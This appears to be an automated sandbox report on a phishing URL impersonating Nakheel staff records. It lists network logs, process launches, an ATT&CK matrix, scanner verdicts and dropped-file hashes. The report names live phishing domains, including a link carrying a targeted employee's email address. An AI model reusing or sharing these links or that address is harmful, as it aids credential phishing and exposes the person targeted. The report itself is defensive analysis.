Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownHTTPS traffic detected: 23.52.182.8:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.52.182.8:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: classification engineClassification label: mal52.win@21/44@28/12
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2272,i,518914970314299408,18083616340213394987,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=2272,i,518914970314299408,18083616340213394987,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20=0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru/988387090550690360942vzLvHtGVHERARQUWXWDBFMNZLRVRYOYAYHSOXNLMIK0%Avira URL Cloudsafe
https://qqc.ardsmandons.com/4R2xjWr/100%Avira URL Cloudphishing
https://qqc.ardsmandons.com/favicon.ico100%Avira URL Cloudphishing
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    code.jquery.com
    151.101.194.137
    truefalse
      high
      cdnjs.cloudflare.com
      104.17.24.14
      truefalse
        high
        challenges.cloudflare.com
        104.18.95.41
        truefalse
          high
          www.google.com
          142.250.181.68
          truefalse
            high
            nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com
            94.46.180.190
            truetrue
              unknown
              qqc.ardsmandons.com
              172.67.177.19
              truefalse
                unknown
                98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru
                104.21.65.72
                truefalse
                  unknown
                  www.azure.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    https://98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ru/988387090550690360942vzLvHtGVHERARQUWXWDBFMNZLRVRYOYAYHSOXNLMIKfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://code.jquery.com/jquery-3.6.0.min.jsfalse
                      high
                      https://challenges.cloudflare.com/turnstile/v0/g/e4025c85ea63/api.jsfalse
                        high
                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/qgqz3/0x4AAAAAAAz5HcczQ_Y58zGl/auto/fbE/normal/auto/false
                          high
                          https://qqc.ardsmandons.com/4R2xjWr/false
                          • Avira URL Cloud: phishing
                          unknown
                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e82bfcf1ab94363&lang=autofalse
                            high
                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/8e82bfcf1ab94363/1732549357173/ccce095667aa92a7495f36d6268a9260aff23fd8f55ad65a788d14cc1ea784da/ODAl4Am2Zd02-Omfalse
                              high
                              https://qqc.ardsmandons.com/4R2xjWr/#Bsabika.abid@nakheel.comfalse
                                unknown
                                https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                  high
                                  https://a.nel.cloudflare.com/report/v4?s=70RJmGbFjusI5q%2F7w6atdrBuxIZdTyPkjkH7VRk2BN95bh4VlysmuFzVNyW1jn%2FW820i0GvDDWXgJOkCFRlEBCPvcyGQf3P8gAqgYvo9QEeTHm4VVXygauvSFapZQg%3D%3Dfalse
                                    high
                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/8483636:1732548334:qatzfLsdWnn2uID_O6ulEbg-8PKAVWoVLs9erdHCWOA/8e82bfcf1ab94363/hwCBjRMZRBug6QUHIo8pkoJHB0bg199dhoOmFBOknk4-1732549352-1.1.1.1-W02dE4SJg1LEqxYn._MVvE_JDplRpnbMbGpKdagnp3aiY4qmIMS7S1mKMY.sC0_nfalse
                                      high
                                      http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20=false
                                        unknown
                                        https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                          high
                                          https://qqc.ardsmandons.com/favicon.icofalse
                                          • Avira URL Cloud: phishing
                                          unknown
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8e82bfcf1ab94363/1732549357172/tddkygsc6Gt9a0Ufalse
                                            high
                                            NameSourceMaliciousAntivirus DetectionReputation
                                            https://github.com/mozilla/rhino/issues/346chromecache_83.2.drfalse
                                              high
                                              https://tc39.es/ecma262/#sec-toobjectchromecache_83.2.drfalse
                                                high
                                                https://bugzil.la/548397chromecache_83.2.drfalse
                                                  high
                                                  https://tc39.es/ecma262/#sec-lengthofarraylikechromecache_83.2.drfalse
                                                    high
                                                    https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slot-aecchromecache_83.2.drfalse
                                                      high
                                                      https://tc39.es/ecma262/#sec-iscallablechromecache_83.2.drfalse
                                                        high
                                                        https://tc39.es/ecma262/#sec-object.getownpropertydescriptorchromecache_83.2.drfalse
                                                          high
                                                          https://github.com/zloirock/core-jschromecache_83.2.drfalse
                                                            high
                                                            https://tc39.es/ecma262/#sec-object.prototype.propertyisenumerablechromecache_83.2.drfalse
                                                              high
                                                              https://tc39.es/ecma262/#sec-array.prototype.includeschromecache_83.2.drfalse
                                                                high
                                                                https://tc39.es/ecma262/#sec-object.definepropertychromecache_83.2.drfalse
                                                                  high
                                                                  https://tc39.es/ecma262/#sec-object.setprototypeofchromecache_83.2.drfalse
                                                                    high
                                                                    https://tc39.es/ecma262/#sec-hasownpropertychromecache_83.2.drfalse
                                                                      high
                                                                      https://tc39.es/ecma262/#sec-math.truncchromecache_83.2.drfalse
                                                                        high
                                                                        https://bugs.chromium.org/p/v8/issues/detail?id=12006chromecache_83.2.drfalse
                                                                          high
                                                                          https://bugzilla.mozilla.org/show_bug.cgi?id=277178chromecache_83.2.drfalse
                                                                            high
                                                                            https://github.com/tc39/proposal-error-causechromecache_83.2.drfalse
                                                                              high
                                                                              https://bugzilla.mozilla.org/show_bug.cgi?id=308064chromecache_83.2.drfalse
                                                                                high
                                                                                https://tc39.es/ecma262/#sec-tointegerorinfinitychromecache_83.2.drfalse
                                                                                  high
                                                                                  https://tc39.es/ecma262/#sec-requireobjectcoerciblechromecache_83.2.drfalse
                                                                                    high
                                                                                    https://github.com/w3c/aria-practices/pull/1757chromecache_83.2.drfalse
                                                                                      high
                                                                                      https://keycode.info/table-of-all-keycodeschromecache_83.2.drfalse
                                                                                        high
                                                                                        https://tc39.es/ecma262/#sec-getmethodchromecache_83.2.drfalse
                                                                                          high
                                                                                          https://tc39.es/ecma262/#sec-toprimitivechromecache_83.2.drfalse
                                                                                            high
                                                                                            https://github.com/nevware21/ts-asyncchromecache_70.2.dr, chromecache_74.2.drfalse
                                                                                              high
                                                                                              https://developer.mozilla.org/en-US/docs/Web/API/KeyboardEvent/key/Key_Valueschromecache_83.2.drfalse
                                                                                                high
                                                                                                https://tc39.es/ecma262/#sec-topropertykeychromecache_83.2.drfalse
                                                                                                  high
                                                                                                  https://dev.azure.com/mscomdev/Moray/_workitems/edit/4494chromecache_83.2.drfalse
                                                                                                    high
                                                                                                    https://github.com/zloirock/core-js/blob/v3.25.0/LICENSEchromecache_83.2.drfalse
                                                                                                      high
                                                                                                      https://elad.medium.com/css-position-sticky-how-it-really-works-54cd01dc2d46chromecache_83.2.drfalse
                                                                                                        high
                                                                                                        https://bugs.chromium.org/p/v8/issues/detail?id=3334chromecache_83.2.drfalse
                                                                                                          high
                                                                                                          https://tc39.es/ecma262/#sec-object.getownpropertynameschromecache_83.2.drfalse
                                                                                                            high
                                                                                                            https://javascript.info/size-and-scroll-window#width-height-of-the-documentchromecache_83.2.drfalse
                                                                                                              high
                                                                                                              https://tc39.es/ecma262/#sec-array.prototype.indexofchromecache_83.2.drfalse
                                                                                                                high
                                                                                                                https://tc39.es/ecma262/#sec-tolengthchromecache_83.2.drfalse
                                                                                                                  high
                                                                                                                  https://tc39.es/ecma262/#sec-IsHTMLDDA-internal-slotchromecache_83.2.drfalse
                                                                                                                    high
                                                                                                                    https://github.com/zloirock/core-js/issues/86#issuecomment-115759028chromecache_83.2.drfalse
                                                                                                                      high
                                                                                                                      https://tc39.es/proposal-error-cause/#sec-errorobjects-install-error-causechromecache_83.2.drfalse
                                                                                                                        high
                                                                                                                        https://tc39.es/ecma262/#sec-ordinarytoprimitivechromecache_83.2.drfalse
                                                                                                                          high
                                                                                                                          • No. of IPs < 25%
                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                          • 75% < No. of IPs
                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                          104.17.24.14
                                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          104.21.65.72
                                                                                                                          98ox8ctwihwkrs2a8umb2hviudo7s9wgwc5jspvv0du6rxlb4v4gnnr2.bfcgpixdwnw.ruUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          104.18.94.41
                                                                                                                          unknownUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          104.18.95.41
                                                                                                                          challenges.cloudflare.comUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          94.46.180.190
                                                                                                                          nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.comPortugal
                                                                                                                          24768ALMOUROLTECPTtrue
                                                                                                                          151.101.2.137
                                                                                                                          unknownUnited States
                                                                                                                          54113FASTLYUSfalse
                                                                                                                          239.255.255.250
                                                                                                                          unknownReserved
                                                                                                                          unknownunknownfalse
                                                                                                                          172.67.177.19
                                                                                                                          qqc.ardsmandons.comUnited States
                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                          142.250.181.68
                                                                                                                          www.google.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          151.101.194.137
                                                                                                                          code.jquery.comUnited States
                                                                                                                          54113FASTLYUSfalse
                                                                                                                          35.190.80.1
                                                                                                                          a.nel.cloudflare.comUnited States
                                                                                                                          15169GOOGLEUSfalse
                                                                                                                          IP
                                                                                                                          192.168.2.4
                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                          Analysis ID:1562504
                                                                                                                          Start date and time:2024-11-25 16:41:22 +01:00
                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                          Overall analysis duration:0h 3m 3s
                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                          Report type:full
                                                                                                                          Cookbook file name:browseurl.jbs
                                                                                                                          Sample URL:http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20=
                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                          Number of new started drivers analysed:0
                                                                                                                          Number of existing processes analysed:0
                                                                                                                          Number of existing drivers analysed:0
                                                                                                                          Number of injected processes analysed:0
                                                                                                                          Technologies:
                                                                                                                          • HCA enabled
                                                                                                                          • EGA enabled
                                                                                                                          • AMSI enabled
                                                                                                                          Analysis Mode:default
                                                                                                                          Analysis stop reason:Timeout
                                                                                                                          Detection:MAL
                                                                                                                          Classification:mal52.win@21/44@28/12
                                                                                                                          EGA Information:Failed
                                                                                                                          HCA Information:
                                                                                                                          • Successful, ratio: 100%
                                                                                                                          • Number of executed functions: 0
                                                                                                                          • Number of non-executed functions: 0
                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                          • Excluded IPs from analysis (whitelisted): 172.217.19.227, 172.217.19.238, 74.125.205.84, 34.104.35.123, 199.232.214.172, 192.229.221.95, 20.236.44.162, 20.112.250.133, 2.20.42.96, 2.20.41.218, 172.217.17.35, 184.24.77.137, 184.24.77.143
                                                                                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, otelrules.azureedge.net, reroute443.trafficmanager.net, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, clientservices.googleapis.com, a1449.dscg2.akamai.net, fe3cr.delivery.mp.microsoft.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, reroute.microsoft.com, www.microsoft.com-c-3.edgekey.net, clients2.google.com, azure.microsoft.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, acom-site-prod-glbl-01.trafficmanager.net, clients.l.google.com, img-prod-cms-rt-microsoft-com.akamaized.net, www.microsoft.com, azure.microsoft.com.edgekey.net, e17307.dscb.akamaiedge.net
                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                          • VT rate limit hit for: http://nakheel.com.staffrecords-2024auaqc-iqodlfdhb.copypremium.com/?staffrecords/2024/=c2FiaWthLmFiaWRAbmFraGVlbC5jb20=
                                                                                                                          No simulations
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          No context
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):48316
                                                                                                                          Entropy (8bit):5.6346993394709
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                          MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4054
                                                                                                                          Entropy (8bit):7.797012573497454
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zICvnyRHJ3BRZPcSPQ72N2xoiR4fTJX/rj4sFNMkk5/p1k2lPUmbm39o4aL7V9XH:10nvE724xoiRQJPrjpLKSFl9oX31Z1d
                                                                                                                          MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                                                                          SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                                                                          SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                                                                          SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                                                                          Malicious:false
                                                                                                                          Reputation:low
                                                                                                                          Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          File Type:ASCII text, with very long lines (47694)
                                                                                                                          Category:downloaded
                                                                                                                          Size (bytes):47695
                                                                                                                          Entropy (8bit):5.401533135534308
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:IXCtQmIutwVHozZBF6gmXLSOzQDjdadOQbk6sgEvxm7b39tobLKZUenw81KZLGcD:IGJWHozZBF6xbGeLsVvQ33FUeDW
                                                                                                                          MD5:481EDB6F4045F16980C920CCD9705105
                                                                                                                          SHA1:D8CB40ABC935DC65D25D83D8358F52AC88742F73
                                                                                                                          SHA-256:5F7C821EEA52471A9BBB0397DF6B77EE279505BE05BB52AEF00932989522D3C2
